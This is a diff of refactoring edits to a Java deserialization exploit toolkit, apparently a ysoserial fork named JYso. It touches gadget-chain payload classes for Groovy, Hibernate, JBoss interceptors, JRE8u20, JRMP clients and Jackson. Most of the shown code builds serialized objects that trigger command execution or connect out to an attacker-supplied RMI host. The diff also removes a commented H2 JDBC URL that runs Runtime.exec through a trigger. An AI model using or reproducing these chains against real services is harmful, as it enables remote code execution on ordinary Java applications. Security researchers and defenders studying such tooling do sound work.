} else {
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import java.util.Map;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
|
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
|
||||||
@Authors({Authors.FROHOFF})
|
@Authors({Authors.FROHOFF})
|
||||||
public class Groovy1 implements ObjectPayload<InvocationHandler> {
|
public class Groovy1 implements ObjectPayload<InvocationHandler> {
|
||||||
@@ -20,8 +21,6 @@ public class Groovy1 implements ObjectPayload<InvocationHandler> {
|
|||||||
|
|
||||||
final Map map = createProxy(closure, Map.class);
|
final Map map = createProxy(closure, Map.class);
|
||||||
|
|
||||||
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
|
return Gadgets.createMemoizedInvocationHandler(map);
|
||||||
|
|
||||||
return handler;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -38,6 +38,7 @@ import static com.qi4l.JYso.gadgets.utils.Utils.makeMap;
|
|||||||
*
|
*
|
||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
|
public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
|
||||||
|
|
||||||
@@ -101,16 +102,16 @@ public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
|
|||||||
return arr;
|
return arr;
|
||||||
}
|
}
|
||||||
|
|
||||||
static Object makeCaller(Object tpl, Object getters) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
|
static Object makeCaller(Object tpl, Object getters) throws
|
||||||
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
|
Exception {
|
||||||
if (System.getProperty("hibernate3") != null) {
|
if (System.getProperty("hibernate3") != null) {
|
||||||
return makeHibernate3Caller(tpl, getters);
|
return makeHibernate3Caller(tpl, getters);
|
||||||
}
|
}
|
||||||
return makeHibernate45Caller(tpl, getters);
|
return makeHibernate45Caller(tpl, getters);
|
||||||
}
|
}
|
||||||
|
|
||||||
static Object makeHibernate45Caller(Object tpl, Object getters) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
|
static Object makeHibernate45Caller(Object tpl, Object getters) throws
|
||||||
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
|
Exception {
|
||||||
PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
|
PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
|
||||||
Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
|
Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
|
||||||
|
|
||||||
@@ -132,8 +133,8 @@ public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
|
|||||||
return makeMap(v1, v2);
|
return makeMap(v1, v2);
|
||||||
}
|
}
|
||||||
|
|
||||||
static Object makeHibernate3Caller(Object tpl, Object getters) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
|
static Object makeHibernate3Caller(Object tpl, Object getters) throws
|
||||||
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
|
Exception {
|
||||||
// Load at runtime to avoid dependency conflicts
|
// Load at runtime to avoid dependency conflicts
|
||||||
Class entityEntityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");
|
Class entityEntityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");
|
||||||
Class entityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.EntityModeToTuplizerMapping");
|
Class entityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.EntityModeToTuplizerMapping");
|
||||||
|
|||||||
@@ -34,6 +34,8 @@ import com.sun.rowset.JdbcRowSetImpl;
|
|||||||
*
|
*
|
||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class Hibernate2 implements ObjectPayload<Object>, DynamicDependencies {
|
public class Hibernate2 implements ObjectPayload<Object>, DynamicDependencies {
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,5 @@
|
|||||||
package com.qi4l.JYso.gadgets;
|
package com.qi4l.JYso.gadgets;
|
||||||
|
|
||||||
import com.alibaba.fastjson.JSONArray;
|
|
||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
import com.qi4l.JYso.gadgets.utils.DynamicDependencies;
|
||||||
@@ -8,13 +7,13 @@ import javassist.ClassPool;
|
|||||||
import javassist.CtClass;
|
import javassist.CtClass;
|
||||||
import javassist.CtMethod;
|
import javassist.CtMethod;
|
||||||
|
|
||||||
import javax.management.BadAttributeValueExpException;
|
|
||||||
import java.lang.reflect.Field;
|
|
||||||
import java.util.HashMap;
|
import java.util.HashMap;
|
||||||
import java.util.Map;
|
import java.util.Map;
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.Fastjson1.getFastjsonSink;
|
||||||
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
import static com.qi4l.JYso.gadgets.utils.InjShell.insertField;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({" org.hibernate.hibernate-core:hibernate-core <= 4.1.12.Fina", "com.alibaba.fastjson:com.alibaba.fastjson 1.X"})
|
@Dependencies({" org.hibernate.hibernate-core:hibernate-core <= 4.1.12.Fina", "com.alibaba.fastjson:com.alibaba.fastjson 1.X"})
|
||||||
@Authors({Authors.UNAM4})
|
@Authors({Authors.UNAM4})
|
||||||
public class Hibernate3JDBC implements ObjectPayload<Object>, DynamicDependencies {
|
public class Hibernate3JDBC implements ObjectPayload<Object>, DynamicDependencies {
|
||||||
@@ -47,29 +46,7 @@ public class Hibernate3JDBC implements ObjectPayload<Object>, DynamicDependencie
|
|||||||
|
|
||||||
clazz.getMethod("configure", Map.class).invoke(o1, map1);
|
clazz.getMethod("configure", Map.class).invoke(o1, map1);
|
||||||
|
|
||||||
JSONArray jsonArray = new JSONArray();
|
return getFastjsonSink(o1);
|
||||||
jsonArray.add(o1);
|
|
||||||
|
|
||||||
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
|
|
||||||
Field valfield = val.getClass().getDeclaredField("val");
|
|
||||||
valfield.setAccessible(true);
|
|
||||||
valfield.set(val, jsonArray);
|
|
||||||
|
|
||||||
HashMap hashMap = new HashMap();
|
|
||||||
hashMap.put(o1, val);
|
|
||||||
return hashMap;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// public static void main(String[] args) throws Exception{
|
|
||||||
// Hibernate3JDBC hibernate3JDBC = new Hibernate3JDBC();
|
|
||||||
// String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
|
|
||||||
// "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
|
|
||||||
// "java.lang.Runtime.getRuntime().exec('open .')\n" +
|
|
||||||
// "$$\n";
|
|
||||||
// Object object = hibernate3JDBC.getObject(JDBC_URL);
|
|
||||||
// ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./c3p0"));
|
|
||||||
// outputStream.writeObject(object);
|
|
||||||
// outputStream.close();
|
|
||||||
//
|
|
||||||
// }
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -2,27 +2,10 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
import com.qi4l.JYso.gadgets.annotation.Dependencies;
|
||||||
import com.qi4l.JYso.gadgets.utils.Gadgets;
|
|
||||||
import com.qi4l.JYso.gadgets.utils.Reflections;
|
|
||||||
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
|
|
||||||
import org.jboss.interceptor.builder.InterceptionModelBuilder;
|
|
||||||
import org.jboss.interceptor.builder.MethodReference;
|
|
||||||
import org.jboss.interceptor.proxy.DefaultInvocationContextFactory;
|
|
||||||
import org.jboss.interceptor.proxy.InterceptorMethodHandler;
|
|
||||||
import org.jboss.interceptor.reader.ClassMetadataInterceptorReference;
|
|
||||||
import org.jboss.interceptor.reader.DefaultMethodMetadata;
|
|
||||||
import org.jboss.interceptor.reader.ReflectiveClassMetadata;
|
|
||||||
import org.jboss.interceptor.reader.SimpleInterceptorMetadata;
|
|
||||||
import org.jboss.interceptor.spi.instance.InterceptorInstantiator;
|
|
||||||
import org.jboss.interceptor.spi.metadata.InterceptorReference;
|
|
||||||
import org.jboss.interceptor.spi.metadata.MethodMetadata;
|
|
||||||
import org.jboss.interceptor.spi.model.InterceptionModel;
|
|
||||||
import org.jboss.interceptor.spi.model.InterceptionType;
|
|
||||||
|
|
||||||
import java.lang.reflect.Constructor;
|
|
||||||
import java.util.*;
|
|
||||||
|
|
||||||
|
import static com.qi4l.JYso.gadgets.JavassistWeld1.get_chain;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final",
|
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final",
|
||||||
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
|
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
|
||||||
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21"})
|
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21"})
|
||||||
@@ -30,45 +13,6 @@ import java.util.*;
|
|||||||
public class JBossInterceptors1 implements ObjectPayload<Object> {
|
public class JBossInterceptors1 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
final Object tpl;
|
return get_chain(command, null, org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
|
||||||
tpl = Gadgets.createTemplatesImpl(command);
|
|
||||||
|
|
||||||
InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
|
|
||||||
ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
|
|
||||||
InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);
|
|
||||||
|
|
||||||
Set<InterceptionType> s = new HashSet<InterceptionType>();
|
|
||||||
s.add(org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
|
|
||||||
|
|
||||||
Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
|
|
||||||
Reflections.setAccessible(defaultMethodMetadataConstructor);
|
|
||||||
MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
|
|
||||||
MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));
|
|
||||||
|
|
||||||
List list = new ArrayList();
|
|
||||||
list.add(methodMetadata);
|
|
||||||
Map<org.jboss.interceptor.spi.model.InterceptionType, List<MethodMetadata>> hashMap = new HashMap<org.jboss.interceptor.spi.model.InterceptionType, List<MethodMetadata>>();
|
|
||||||
|
|
||||||
hashMap.put(org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE, list);
|
|
||||||
SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);
|
|
||||||
|
|
||||||
builder.interceptAll().with(simpleInterceptorMetadata);
|
|
||||||
|
|
||||||
InterceptionModel model = builder.build();
|
|
||||||
|
|
||||||
HashMap map = new HashMap();
|
|
||||||
map.put("ysoserial", "ysoserial");
|
|
||||||
|
|
||||||
DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();
|
|
||||||
|
|
||||||
InterceptorInstantiator interceptorInstantiator = new InterceptorInstantiator() {
|
|
||||||
|
|
||||||
public Object createFor(InterceptorReference paramInterceptorReference) {
|
|
||||||
|
|
||||||
return tpl;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -18,7 +18,7 @@ import java.util.Map;
|
|||||||
import static com.qi4l.JYso.Starter.JYsoMode;
|
import static com.qi4l.JYso.Starter.JYsoMode;
|
||||||
|
|
||||||
|
|
||||||
@SuppressWarnings({"unused"})
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
@Dependencies
|
@Dependencies
|
||||||
@Authors({"frohoff"})
|
@Authors({"frohoff"})
|
||||||
public class JRE8u20 implements ObjectPayload<Object> {
|
public class JRE8u20 implements ObjectPayload<Object> {
|
||||||
@@ -55,9 +55,9 @@ public class JRE8u20 implements ObjectPayload<Object> {
|
|||||||
TCClassDesc beanContextChildSupportDesc = new TCClassDesc("java.beans.beancontext.BeanContextChildSupport");
|
TCClassDesc beanContextChildSupportDesc = new TCClassDesc("java.beans.beancontext.BeanContextChildSupport");
|
||||||
beanContextSupportDesc.addField(new TCClassDesc.Field("serializable", int.class));
|
beanContextSupportDesc.addField(new TCClassDesc.Field("serializable", int.class));
|
||||||
TCObject.ObjectData beanContextSupportData = new TCObject.ObjectData();
|
TCObject.ObjectData beanContextSupportData = new TCObject.ObjectData();
|
||||||
beanContextSupportData.addData(Integer.valueOf(1));
|
beanContextSupportData.addData(1);
|
||||||
beanContextSupportData.addData(handler);
|
beanContextSupportData.addData(handler);
|
||||||
beanContextSupportData.addData(Integer.valueOf(0), true);
|
beanContextSupportData.addData(0, true);
|
||||||
beanContextChildSupportDesc.addField(new TCClassDesc.Field("beanContextChildPeer", BeanContextChild.class));
|
beanContextChildSupportDesc.addField(new TCClassDesc.Field("beanContextChildPeer", BeanContextChild.class));
|
||||||
TCObject.ObjectData beanContextChildSupportData = new TCObject.ObjectData();
|
TCObject.ObjectData beanContextChildSupportData = new TCObject.ObjectData();
|
||||||
beanContextChildSupportData.addData(obj);
|
beanContextChildSupportData.addData(obj);
|
||||||
@@ -74,7 +74,7 @@ public class JRE8u20 implements ObjectPayload<Object> {
|
|||||||
public Object getObject(String command) throws Exception {
|
public Object getObject(String command) throws Exception {
|
||||||
Serialization ser = new Serialization();
|
Serialization ser = new Serialization();
|
||||||
Object templates = makeTemplates(command);
|
Object templates = makeTemplates(command);
|
||||||
HashMap<Object, Object> map = new HashMap<Object, Object>();
|
HashMap<Object, Object> map = new HashMap<>();
|
||||||
map.put("f5a5a608", templates);
|
map.put("f5a5a608", templates);
|
||||||
TCObject handler = makeHandler(map, ser);
|
TCObject handler = makeHandler(map, ser);
|
||||||
TCObject linkedHashset = new TCObject(ser);
|
TCObject linkedHashset = new TCObject(ser);
|
||||||
@@ -84,9 +84,9 @@ public class JRE8u20 implements ObjectPayload<Object> {
|
|||||||
hashsetDesc.addField(new TCClassDesc.Field("fake", BeanContextSupport.class));
|
hashsetDesc.addField(new TCClassDesc.Field("fake", BeanContextSupport.class));
|
||||||
TCObject.ObjectData hashsetData = new TCObject.ObjectData();
|
TCObject.ObjectData hashsetData = new TCObject.ObjectData();
|
||||||
hashsetData.addData(makeBeanContextSupport(handler, ser));
|
hashsetData.addData(makeBeanContextSupport(handler, ser));
|
||||||
hashsetData.addData(Integer.valueOf(10), true);
|
hashsetData.addData(10, true);
|
||||||
hashsetData.addData(Float.valueOf(1.0F), true);
|
hashsetData.addData(1.0F, true);
|
||||||
hashsetData.addData(Integer.valueOf(2), true);
|
hashsetData.addData(2, true);
|
||||||
hashsetData.addData(templates);
|
hashsetData.addData(templates);
|
||||||
TCObject proxy = Util.makeProxy(new Class[]{Map.class}, handler, ser);
|
TCObject proxy = Util.makeProxy(new Class[]{Map.class}, handler, ser);
|
||||||
hashsetData.addData(proxy);
|
hashsetData.addData(proxy);
|
||||||
@@ -100,8 +100,7 @@ public class JRE8u20 implements ObjectPayload<Object> {
|
|||||||
}
|
}
|
||||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||||
ser.write(out);
|
ser.write(out);
|
||||||
byte[] bytes = out.toByteArray();
|
return out.toByteArray();
|
||||||
return bytes;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -18,7 +18,7 @@ import java.util.Map;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
import static com.qi4l.JYso.gadgets.utils.Utils.createProxy;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
public class JRE8u20_2 implements ObjectPayload<Object> {
|
public class JRE8u20_2 implements ObjectPayload<Object> {
|
||||||
public static Class newInvocationHandlerClass() throws Exception {
|
public static Class newInvocationHandlerClass() throws Exception {
|
||||||
ClassPool pool = ClassPool.getDefault();
|
ClassPool pool = ClassPool.getDefault();
|
||||||
@@ -27,8 +27,7 @@ public class JRE8u20_2 implements ObjectPayload<Object> {
|
|||||||
" os.defaultWriteObject();\n" +
|
" os.defaultWriteObject();\n" +
|
||||||
" }", clazz);
|
" }", clazz);
|
||||||
clazz.addMethod(writeObject);
|
clazz.addMethod(writeObject);
|
||||||
Class c = clazz.toClass();
|
return clazz.toClass();
|
||||||
return c;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -40,9 +40,7 @@ import java.util.Random;
|
|||||||
*
|
*
|
||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
@SuppressWarnings({
|
@SuppressWarnings({"unused"})
|
||||||
"restriction"
|
|
||||||
})
|
|
||||||
@Authors({Authors.MBECHLER})
|
@Authors({Authors.MBECHLER})
|
||||||
public class JRMPClient implements ObjectPayload<Object> {
|
public class JRMPClient implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -55,15 +53,14 @@ public class JRMPClient implements ObjectPayload<Object> {
|
|||||||
host = command;
|
host = command;
|
||||||
} else {
|
} else {
|
||||||
host = command.substring(0, sep);
|
host = command.substring(0, sep);
|
||||||
port = Integer.valueOf(command.substring(sep + 1));
|
port = Integer.parseInt(command.substring(sep + 1));
|
||||||
}
|
}
|
||||||
ObjID id = new ObjID(new Random().nextInt()); // RMI registry
|
ObjID id = new ObjID(new Random().nextInt()); // RMI registry
|
||||||
TCPEndpoint te = new TCPEndpoint(host, port);
|
TCPEndpoint te = new TCPEndpoint(host, port);
|
||||||
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
|
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
|
||||||
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
|
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
|
||||||
Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{
|
return (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{
|
||||||
Registry.class
|
Registry.class
|
||||||
}, obj);
|
}, obj);
|
||||||
return proxy;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -11,10 +11,17 @@ import java.rmi.server.ObjID;
|
|||||||
import java.rmi.server.RemoteObjectInvocationHandler;
|
import java.rmi.server.RemoteObjectInvocationHandler;
|
||||||
import java.util.Random;
|
import java.util.Random;
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Authors({"mbechler"})
|
@Authors({"mbechler"})
|
||||||
public class JRMPClient_Activator implements ObjectPayload<Activator> {
|
public class JRMPClient_Activator implements ObjectPayload<Activator> {
|
||||||
@Override
|
@Override
|
||||||
public Activator getObject(String command) throws Exception {
|
public Activator getObject(String command) throws Exception {
|
||||||
|
UnicastRef ref = JRMPSource(command);
|
||||||
|
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
|
||||||
|
return (Activator) Proxy.newProxyInstance(JRMPClient_Activator.class.getClassLoader(), new Class[]{Activator.class}, obj);
|
||||||
|
}
|
||||||
|
|
||||||
|
static UnicastRef JRMPSource(String command) {
|
||||||
String host;
|
String host;
|
||||||
int port, sep = command.indexOf(':');
|
int port, sep = command.indexOf(':');
|
||||||
if (sep < 0) {
|
if (sep < 0) {
|
||||||
@@ -22,13 +29,10 @@ public class JRMPClient_Activator implements ObjectPayload<Activator> {
|
|||||||
host = command;
|
host = command;
|
||||||
} else {
|
} else {
|
||||||
host = command.substring(0, sep);
|
host = command.substring(0, sep);
|
||||||
port = Integer.valueOf(command.substring(sep + 1)).intValue();
|
port = Integer.parseInt(command.substring(sep + 1));
|
||||||
}
|
}
|
||||||
ObjID id = new ObjID((new Random()).nextInt());
|
ObjID id = new ObjID((new Random()).nextInt());
|
||||||
TCPEndpoint te = new TCPEndpoint(host, port);
|
TCPEndpoint te = new TCPEndpoint(host, port);
|
||||||
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
|
return new UnicastRef(new LiveRef(id, te, false));
|
||||||
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
|
|
||||||
Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient_Activator.class.getClassLoader(), new Class[]{Activator.class}, obj);
|
|
||||||
return proxy;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -2,30 +2,15 @@ package com.qi4l.JYso.gadgets;
|
|||||||
|
|
||||||
import com.qi4l.JYso.gadgets.annotation.Authors;
|
import com.qi4l.JYso.gadgets.annotation.Authors;
|
||||||
import sun.rmi.server.UnicastRef;
|
import sun.rmi.server.UnicastRef;
|
||||||
import sun.rmi.transport.LiveRef;
|
|
||||||
import sun.rmi.transport.tcp.TCPEndpoint;
|
|
||||||
|
|
||||||
import java.rmi.server.ObjID;
|
|
||||||
import java.rmi.server.RemoteObjectInvocationHandler;
|
import java.rmi.server.RemoteObjectInvocationHandler;
|
||||||
import java.util.Random;
|
|
||||||
|
|
||||||
|
@SuppressWarnings({"unused"})
|
||||||
@Authors({"mbechler"})
|
@Authors({"mbechler"})
|
||||||
public class JRMPClient_Obj implements ObjectPayload<RemoteObjectInvocationHandler> {
|
public class JRMPClient_Obj implements ObjectPayload<RemoteObjectInvocationHandler> {
|
||||||
@Override
|
@Override
|
||||||
public RemoteObjectInvocationHandler getObject(String command) throws Exception {
|
public RemoteObjectInvocationHandler getObject(String command) throws Exception {
|
||||||
String host;
|
UnicastRef ref = JRMPClient_Activator.JRMPSource(command);
|
||||||
int port, sep = command.indexOf(':');
|
return new RemoteObjectInvocationHandler(ref);
|
||||||
if (sep < 0) {
|
|
||||||
port = (new Random()).nextInt(65535);
|
|
||||||
host = command;
|
|
||||||
} else {
|
|
||||||
host = command.substring(0, sep);
|
|
||||||
port = Integer.valueOf(command.substring(sep + 1)).intValue();
|
|
||||||
}
|
|
||||||
ObjID id = new ObjID((new Random()).nextInt());
|
|
||||||
TCPEndpoint te = new TCPEndpoint(host, port);
|
|
||||||
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
|
|
||||||
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
|
|
||||||
return obj;
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -45,9 +45,7 @@ import static com.qi4l.JYso.gadgets.utils.Utils.*;
|
|||||||
*
|
*
|
||||||
* @author mbechler
|
* @author mbechler
|
||||||
*/
|
*/
|
||||||
@SuppressWarnings({
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
"rawtypes", "unchecked", "restriction"
|
|
||||||
})
|
|
||||||
@Dependencies({"net.sf.json-lib:json-lib:jar:jdk15:2.4", "org.springframework:spring-aop:4.1.4.RELEASE",
|
@Dependencies({"net.sf.json-lib:json-lib:jar:jdk15:2.4", "org.springframework:spring-aop:4.1.4.RELEASE",
|
||||||
// deep deps
|
// deep deps
|
||||||
"aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2", "commons-lang:commons-lang:2.6",
|
"aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2", "commons-lang:commons-lang:2.6",
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import java.util.HashMap;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Reflections.setFieldValue;
|
import static com.qi4l.JYso.gadgets.utils.Reflections.setFieldValue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
// 在触发 getter 的时候是以随机顺序触发的,所以概率打空
|
// 在触发 getter 的时候是以随机顺序触发的,所以概率打空
|
||||||
public class Jackson1 implements ObjectPayload<Object> {
|
public class Jackson1 implements ObjectPayload<Object> {
|
||||||
|
|
||||||
@@ -24,7 +25,7 @@ public class Jackson1 implements ObjectPayload<Object> {
|
|||||||
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
|
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
|
||||||
ctClass.removeMethod(writeReplace);
|
ctClass.removeMethod(writeReplace);
|
||||||
ctClass.toClass();
|
ctClass.toClass();
|
||||||
} catch (Exception EE) {
|
} catch (Exception ignored) {
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -15,6 +15,7 @@ import java.lang.reflect.Proxy;
|
|||||||
|
|
||||||
import static com.qi4l.JYso.gadgets.utils.Reflections.setFieldValue;
|
import static com.qi4l.JYso.gadgets.utils.Reflections.setFieldValue;
|
||||||
|
|
||||||
|
@SuppressWarnings({"rawtypes", "unused"})
|
||||||
public class Jackson2 implements ObjectPayload<Object> {
|
public class Jackson2 implements ObjectPayload<Object> {
|
||||||
public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
|
public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
|
||||||
AdvisedSupport advisedSupport = new AdvisedSupport();
|
AdvisedSupport advisedSupport = new AdvisedSupport();
|
||||||
@@ -22,8 +23,7 @@ public class Jackson2 implements ObjectPayload<Object> {
|
|||||||
Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
|
Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
|
||||||
constructor.setAccessible(true);
|
constructor.setAccessible(true);
|
||||||
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
|
||||||
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
|
return Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
|
||||||
return proxy;
|
|
||||||
}
|
}
|
||||||
|
|
||||||
public Object getObject(final String command) throws Exception {
|
public Object getObject(final String command) throws Exception {
|
||||||
@@ -33,7 +33,7 @@ public class Jackson2 implements ObjectPayload<Object> {
|
|||||||
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
|
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
|
||||||
ctClass.removeMethod(writeReplace);
|
ctClass.removeMethod(writeReplace);
|
||||||
ctClass.toClass();
|
ctClass.toClass();
|
||||||
} catch (Exception EE) {
|
} catch (Exception ignored) {
|
||||||
|
|
||||||
}
|
}
|
||||||
POJONode node = new POJONode(makeTemplatesImplAopProxy(command));
|
POJONode node = new POJONode(makeTemplatesImplAopProxy(command));
|
||||||
|
|||||||
@@ -25,13 +25,11 @@ import static com.qi4l.JYso.gadgets.utils.Reflections.setFieldValue;
|
|||||||
|
|
||||||
|
|
||||||
//Jackson2链的JDK17改造
|
//Jackson2链的JDK17改造
|
||||||
|
@SuppressWarnings({"rawtypes", "unchecked","unused"})
|
||||||
@Dependencies({"spring-apo:6.2.10"})
|
@Dependencies({"spring-apo:6.2.10"})
|
||||||
@Authors({Authors.JSJCW})
|
@Authors({Authors.JSJCW})
|
||||||
public class Jackson3 implements ObjectPayload<Object> {
|
public class Jackson3 implements ObjectPayload<Object> {
|
||||||
public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
|
static InvocationHandler setSuidSource(AdvisedSupport advisedSupport) throws Exception {
|
||||||
AdvisedSupport advisedSupport = new AdvisedSupport();
|
|
||||||
advisedSupport.setTarget(Gadgets.createTemplatesImpl(cmd));
|
|
||||||
|
|
||||||
//<=6.0.23为6115154060221772279
|
//<=6.0.23为6115154060221772279
|
||||||
//>=6.1.0 为273003553246259276
|
//>=6.1.0 为273003553246259276
|
||||||
String sUID = "273003553246259276";
|
String sUID = "273003553246259276";
|
||||||
@@ -39,36 +37,33 @@ public class Jackson3 implements ObjectPayload<Object> {
|
